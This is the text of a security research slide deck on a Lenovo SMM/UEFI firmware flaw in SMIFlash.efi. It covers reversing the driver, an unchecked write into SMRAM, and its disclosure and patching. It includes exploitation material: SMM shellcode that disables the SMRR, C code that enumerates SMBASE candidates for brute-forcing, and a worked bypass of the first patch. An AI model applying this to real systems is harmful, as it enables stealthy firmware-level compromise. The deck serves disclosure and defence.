About unchecked management. Bruno Pujos, July 16, 2016. Slide deck (PowerPoint presentation).



SLIDE 1

About unchecked management SMM & UEFI Vulnerability Patch Conclusion Bruno Pujos 1/45

About unchecked management

Bruno Pujos July 16, 2016

SLIDE 2


Whoami

Bruno Pujos
RE, vulnerability research
LSE 2015
Sogeti since

SLIDE 3


About unchecked management

1 SMM & UEFI: UEFI, System Management Mode, Protections, Vulnerabilities
2 Vulnerability: Reverse, Exploitation
3 Patch
4 Conclusion

SLIDE 4


Agenda

1 SMM & UEFI: UEFI, System Management Mode, Protections, Vulnerabilities


SLIDE 6


UEFI

Unified Extensible Firmware Interface
UEFI is based on EFI
Specification for firmware development
Replaces the Basic Input/Output System (BIOS)
Community effort organized through a forum (the UEFI Forum)

SLIDE 7


Time line

(Figure not reproduced.) Legend: CDP: Columbia Data Products; PCH: Platform Controller Hub; ICH: I/O Controller Hub

SLIDE 8


UEFI specification stages

Security (SEC) Phase
Pre-EFI Initialization (PEI) Phase
Driver Execution Environment (DXE) Phase
Boot Device Selection (BDS) Phase
Runtime (RT) Phase
Afterlife (AL) Phase

SLIDE 9


Protocols

Drivers communicate using protocols
Drivers can install and request protocols
Protocols are identified by a GUID
They expose tables containing function pointers, variables, ...


SLIDE 11


SMM

Often called "ring -2", but really a separate Intel processor operating mode
The switch happens on a System Management Interrupt (SMI)
Separate address space (SMRAM), but it lives in ordinary physical memory
Initialized by the firmware (UEFI)
Responsible for protecting and modifying the firmware
Should be protected

SLIDE 12


System Management Mode

Figure (not reproduced): Intel Modes Of Operation (Intel V.3 C.2 P.2)

SLIDE 13


SMRAM

SLIDE 14


SMM 101

Initialization
Can happen before DXE
Changes the SMBASE (relocation)
Adds a basic handler

SMI handler
SMI handlers are set up mainly during the DXE phase
SMIs are often (only) triggered by the hardware
SMI handlers run in long mode

SLIDE 15


SMM 101

SWSMI
Software SMIs (SWSMI) are SMIs triggered through I/O port 0xB2 (Advanced Power Management Control)
Standard way for the OS to communicate with the UEFI SMM code
Arguments are passed through the registers

    mov dx, 0xB2        ; APM control port: writing it raises an SMI
    mov ax, SMINumber   ; AL = SMI command number (port 0xB2), AH lands in the data port 0xB3
    out dx, ax

SMBASE
SMBASE is chosen by UEFI
Must be known for exploitation


SLIDE 17


Locking mechanism

Goal: prevent persistent corruption
Root of trust: the SPI flash
The specification says: lock the flash if possible
Things that must be locked in practice:
SPI flash
SMRAM

SLIDE 18


SPI Flash Protection

SLIDE 19


SMRAM Protection


SLIDE 21


Vulnerabilities

UEFI is "huge" (~300 "drivers")
One failure and it is over
Main kind of vulnerability: memory corruption
Almost no memory protection (ASLR, NX, ...)

Kinds of vulnerability
"Hardware", Configuration, Software

Possible targets
SMM, UEFI

SLIDE 22


SMM attacks

Only at runtime

Kernel-type vulnerabilities
TOCTOU, dereference of pointers outside of SMM, NULL dereference, ...

"Hardware"-type vulnerabilities
Cache poisoning, DMA write, ...

SLIDE 23


Agenda

2 Vulnerability: Reverse, Exploitation


SLIDE 25


Target: the firmware

Dumped the firmware of a ThinkCentre M92P (version 9SKT91A)
Seems to use protocols from EDK (the old Intel framework)
Contains a lot of references to AMI
Extracted the drivers (DXE & PEI)

SLIDE 26


Target: the driver

Found a driver: SMIFlash.efi
Looks interesting: Flash and SMM in the same place
Let's reverse it!
Disclaimer: all function and variable names are mine.

SLIDE 27


SMIFlash.efi

Steps
Initialization, then the SWSMI handler

Initialization
The smm_main function
Retrieves several variables and protocols
Registers SwSMI 0x20 to 0x25 with SwSMIDispatchFunction

SLIDE 28


SwSMIDispatchFunction

Some initialization, then a switch on the SwSMI number
Retrieves ECX and EBX from the saved context
Combines both into a pointer to a structure (smiflash_arg)
The structure is passed to the functions called from the switch
We only look at SwSMI 0x21

    struct smiflash_arg {
        void   *addr_buf;    // 0x0
        int32_t offset_bios; // 0x8
        int32_t size;        // 0xC
        char    ret;         // 0x10
    };

SLIDE 29


SwSMI handler 0x21

Simple SwSMI handler: swsmi_handler21
Reads from the SPI flash (ReadFlash) and writes the content into the buffer:
addr_buf is the destination
offset_bios is the offset to read from in the flash
size is the number of bytes to read
ret is a return value
Basically a memcpy from the SPI flash to memory

    struct smiflash_arg {
        void   *addr_buf;    // 0x0
        int32_t offset_bios; // 0x8
        int32_t size;        // 0xC
        char    ret;         // 0x10
    };


SLIDE 31


Exploitation

Goal: code execution in SMM

Vulnerability
addr_buf, offset_bios and size are user-controlled
There is no check on their values
addr_buf is a physical address
We can write into SMRAM wherever we want, and whatever we want as long as the bytes exist in the flash
Not a real constraint: every possible byte value is present in the flash

Possibilities
Write a shellcode
Relocate the SMRAM

SLIDE 32


SMBASE

SMBASE location
The SMBASE is needed to relocate the SMRAM
SMBASE does not need to be aligned
Always the same across reboots (for now)
Several possibilities:
RE the SMRAM initialization
Guess it
Fuzz it

Fuzzing SMBASE
Minimum: SMRR_BASE - 0x8000 (the SMI entry point at SMBASE + 0x8000 must be inside the SMRR)
Maximum: SMRR_TOP - 0x10000 (the state save area, which ends at SMBASE + 0xFFFF, must be inside too)
Probably aligned, so minimum step: 0x1000
Pretty efficient, but can crash a lot
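The fuzzing window above follows from the SMRR registers. As an added example (not code from the talk), the following C decodes the IA32_SMRR_PHYSBASE (0x1F2) / IA32_SMRR_PHYSMASK (0x1F3) pair into the protected range and enumerates the SMBASE candidates with the slide's bounds and 0x1000 step. The MSR values in the self-test are constructed; on a real target they must be read with rdmsr from ring 0 (or with a tool such as chipsec) before fuzzing.

```c
/* Added example: derive the SMBASE brute-force window from the SMRR MSRs.
 * The SMRR encodes a 4 KiB-aligned base and mask in bits 12..31; bit 11
 * of PHYSMASK is the valid bit. The DEMO_* MSR values are constructed. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define IA32_SMRR_PHYSBASE 0x1F2
#define IA32_SMRR_PHYSMASK 0x1F3
#define SMRR_VALID         (1ULL << 11)
#define SMRR_ADDR          0xFFFFF000ULL   /* address bits 12..31 */

#define SMI_ENTRY_OFFSET   0x8000ULL   /* SMI handler entry point is SMBASE + 0x8000 */
#define SMM_SAVE_AREA_END  0x10000ULL  /* state save area occupies up to SMBASE + 0xFFFF */

/* Constructed MSR pair: memory type 6 (WB), base 0x8B000000, 8 MiB, valid. */
#define DEMO_PHYSBASE 0x8B000006ULL
#define DEMO_PHYSMASK 0xFF800800ULL

struct smrr {
    bool     valid;
    uint64_t base;   /* first protected byte */
    uint64_t top;    /* one past the last protected byte */
};

/* An address is covered when (addr & mask) == base, so the range size is
 * the lowest set bit of the mask (two's complement: ~mask + 1). */
struct smrr smrr_decode(uint64_t physbase, uint64_t physmask)
{
    struct smrr r;
    uint64_t mask = physmask & SMRR_ADDR;
    r.valid = (physmask & SMRR_VALID) != 0;
    r.base  = physbase & SMRR_ADDR;
    r.top   = r.base + ((~mask + 1) & 0xFFFFFFFFULL);
    return r;
}

/* Write candidate SMBASE values (4 KiB steps) into `out`: the entry point
 * and the whole state save area must both fall inside the SMRR.
 * Returns the total count even if `out` is NULL or too small. */
uint64_t smbase_candidates(const struct smrr *r, uint64_t *out, size_t cap)
{
    if (!r->valid || r->top - r->base < SMM_SAVE_AREA_END || r->base < SMI_ENTRY_OFFSET)
        return 0;
    uint64_t lo = r->base - SMI_ENTRY_OFFSET;   /* SMBASE + 0x8000 >= SMRR_BASE */
    uint64_t hi = r->top - SMM_SAVE_AREA_END;   /* SMBASE + 0x10000 <= SMRR_TOP */
    uint64_t n = 0;
    for (uint64_t s = lo; s <= hi; s += 0x1000, n++)
        if (out && n < cap)
            out[n] = s;
    return n;
}

/* Number of candidates for the constructed MSR pair (2041 for DEMO_*). */
uint64_t demo_candidate_count(void)
{
    struct smrr r = smrr_decode(DEMO_PHYSBASE, DEMO_PHYSMASK);
    return smbase_candidates(&r, NULL, 0);
}

int main(void)
{
    struct smrr r = smrr_decode(DEMO_PHYSBASE, DEMO_PHYSMASK);
    printf("SMRR %s: [0x%llx, 0x%llx)\n", r.valid ? "valid" : "invalid",
           (unsigned long long)r.base, (unsigned long long)r.top);
    printf("SMBASE window: 0x%llx .. 0x%llx, %llu candidates\n",
           (unsigned long long)(r.base - SMI_ENTRY_OFFSET),
           (unsigned long long)(r.top - SMM_SAVE_AREA_END),
           (unsigned long long)demo_candidate_count());
    return 0;
}
```

Each candidate still has to be tried by writing the relocation payload and triggering an SMI, which is why the slide warns that the approach crashes a lot: a wrong guess corrupts whatever sits at the guessed offset inside SMRAM.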

SLIDE 33


Exploitation

SLIDE 34


Shellcode

    mov ecx, 0x1F3                    ; IA32_SMRR_PHYSMASK
    xor edx, edx
    xor eax, eax
    wrmsr                             ; clear the SMRR mask (valid bit off): SMRAM is now accessible from outside SMM
    mov eax, $realsmbase
    mov ebx, ($fakesmbase + 0xFEF8)   ; SMBASE field of the SMM state save area
    mov [ebx], eax                    ; restore the original SMBASE so later SMIs run the real SMRAM code again
    rsm                               ; resume; the CPU reloads SMBASE from the save area

SLIDE 35


Agenda

3 Patch

SLIDE 36


Patch

We reported the vulnerability
Some time later the firmware got an update: 9SKT92A
Of course I was interested in how they fixed it
Let's go reverse!
The patch is in two parts

SLIDE 37


Patch 9SKT92A: Initialization

smm_main retrieves new information:
Gets the HOB list from the ConfigurationTable
Searches the HOB list for a structure and copies it
This structure contains SMRAM_BASE and SMRAM_SIZE

HOB: Hand-Off Block

SLIDE 38


Patch 9SKT92A: Check

A new isPointerOutSMRAM function is added
It uses SMRAM_BASE and SMRAM_SIZE
It takes a buffer (buf) and a size as parameters
It is used on the first structure and in the SwSMI handlers 0x21, 0x22, 0x23
It checks that buf is below SMRAM_BASE or above SMRAM_BASE + SMRAM_SIZE
Same check for buf + size

SLIDE 39


Patch 9SKT92A: fail

In SwSMI 0x21 the check is applied to addr_buf. We can choose:

addr_buf < SMRAM_BASE
addr_buf + size > SMRAM_BASE + SMRAM_SIZE

Both endpoints are outside SMRAM, so a range that covers the whole SMRAM passes the check.
There is not even an integer overflow check on buf + size...

SLIDE 40


Patch 9SKT92A: exploit ?

Much harder to exploit
Potentially impossible on some firmware, but:

ReadFlash may stop in the middle in some cases
Rewriting the code: potential for a multi-CPU race
The overflow can help us

An exact layout of the SMRAM is necessary
The exploit will probably depend on the firmware version :(
But we reported it...

SLIDE 41


Patch v2

Got an update: 9SKT95A
And an advisory: LEN-4710!
Modifications in the isPointerOutSMRAM function:

Check for overflow
Check that buf and buf + size are on the same side of the SMRAM

There is even too much checking...
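The three states of the SwSMI 0x21 argument check described on the Exploitation, Patch 9SKT92A and Patch v2 slides can be modelled on a host. The following C is an added example, not the vendor's code: check_none stands for the unchecked 9SKT91A handler, check_v1 for the per-endpoint isPointerOutSMRAM of 9SKT92A, and check_v2 for the overflow-safe same-side check of 9SKT95A. SMRAM_BASE and SMRAM_SIZE are invented (the real values come from the HOB list at runtime), the treatment of size as an unsigned 32-bit count is an assumption, and handler21/run21 are names chosen here for the model.

```c
/* Added example: the SwSMI 0x21 destination check in its three states.
 * SMRAM_BASE/SMRAM_SIZE are constructed; the real ones come from the HOB. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define SMRAM_BASE 0x8B000000ULL             /* assumption: example layout */
#define SMRAM_SIZE 0x00800000ULL             /* 8 MiB */
#define SMRAM_END  (SMRAM_BASE + SMRAM_SIZE) /* exclusive */

/* Argument block the dispatcher builds from EBX/ECX (layout from the slides). */
struct smiflash_arg {
    uint64_t addr_buf;    /* 0x0: destination physical address, caller-chosen */
    int32_t  offset_bios; /* 0x8: read offset in the SPI flash */
    int32_t  size;        /* 0xC: bytes to copy */
    char     ret;         /* 0x10: status for the caller */
};

typedef bool (*range_check_t)(uint64_t buf, uint64_t size);

/* 9SKT91A: no validation at all. */
bool check_none(uint64_t buf, uint64_t size)
{
    (void)buf; (void)size;
    return true;
}

/* 9SKT92A isPointerOutSMRAM: buf and buf + size tested one at a time.
 * buf + size may wrap, and a range that starts below SMRAM and ends above
 * it has both endpoints "outside" yet covers all of SMRAM. */
bool check_v1(uint64_t buf, uint64_t size)
{
    uint64_t end = buf + size;  /* no overflow check */
    bool buf_out = buf < SMRAM_BASE || buf >= SMRAM_END;
    bool end_out = end < SMRAM_BASE || end >= SMRAM_END;
    return buf_out && end_out;
}

/* 9SKT95A: refuse wrap-around, then require [buf, buf + size) to lie
 * entirely below or entirely above SMRAM (both ends on the same side). */
bool check_v2(uint64_t buf, uint64_t size)
{
    if (size > UINT64_MAX - buf)
        return false;
    uint64_t end = buf + size;
    return end <= SMRAM_BASE || buf >= SMRAM_END;
}

/* Bytes of [buf, buf + size) that land in SMRAM if the copy goes ahead.
 * The interval is saturated, not wrapped, since the copy walks up from buf. */
uint64_t smram_bytes_hit(uint64_t buf, uint64_t size)
{
    uint64_t end = size > UINT64_MAX - buf ? UINT64_MAX : buf + size;
    uint64_t lo = buf > SMRAM_BASE ? buf : SMRAM_BASE;
    uint64_t hi = end < SMRAM_END ? end : SMRAM_END;
    return hi > lo ? hi - lo : 0;
}

/* Model of swsmi_handler21 under a given check: -1 when refused, otherwise
 * the number of SMRAM bytes the flash-to-memory copy would overwrite. */
int64_t handler21(const struct smiflash_arg *arg, range_check_t check)
{
    uint64_t size = (uint32_t)arg->size;   /* assumption: unsigned 32-bit count */
    if (!check(arg->addr_buf, size))
        return -1;
    /* ReadFlash(offset_bios, size) followed by the copy to addr_buf would run here. */
    return (int64_t)smram_bytes_hit(arg->addr_buf, size);
}

/* Convenience wrapper: build the argument block and run the handler model. */
int64_t run21(uint64_t addr_buf, int32_t size, range_check_t check)
{
    struct smiflash_arg a = { addr_buf, 0, size, 0 };
    return handler21(&a, check);
}

int main(void)
{
    /* The straddling request from the "Patch 9SKT92A: fail" slide. */
    uint64_t buf = SMRAM_BASE - 0x1000;
    int32_t  size = (int32_t)(SMRAM_SIZE + 0x2000);
    printf("straddle  none=%lld v1=%lld v2=%lld\n",
           (long long)run21(buf, size, check_none),
           (long long)run21(buf, size, check_v1),
           (long long)run21(buf, size, check_v2));
    printf("wrap      v1=%d v2=%d\n", check_v1(0xFFFFFFFFFFFFF000ULL, 0x2000),
           check_v2(0xFFFFFFFFFFFFF000ULL, 0x2000));
    return 0;
}
```

With the straddling request, check_v1 accepts and the copy would overwrite every byte of SMRAM; check_v2 rejects it, as it rejects the wrap-around case that check_v1 also lets through.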

SLIDE 42


Agenda

4 Conclusion

SLIDE 43


Can’t we make things better

Lots of ways to fail with a design like that
Nothing is really standardized
A buffer at a static physical address reserved by the BIOS would be a much better idea
But backward compatibility (especially in firmware)...

SLIDE 44


Conclusion

Lenovo is not the only vendor impacted
The only one to have published an advisory
At least 10 manufacturers are impacted
Probably several thousand computers

SLIDE 45


The End

Thank you for your attention. Questions?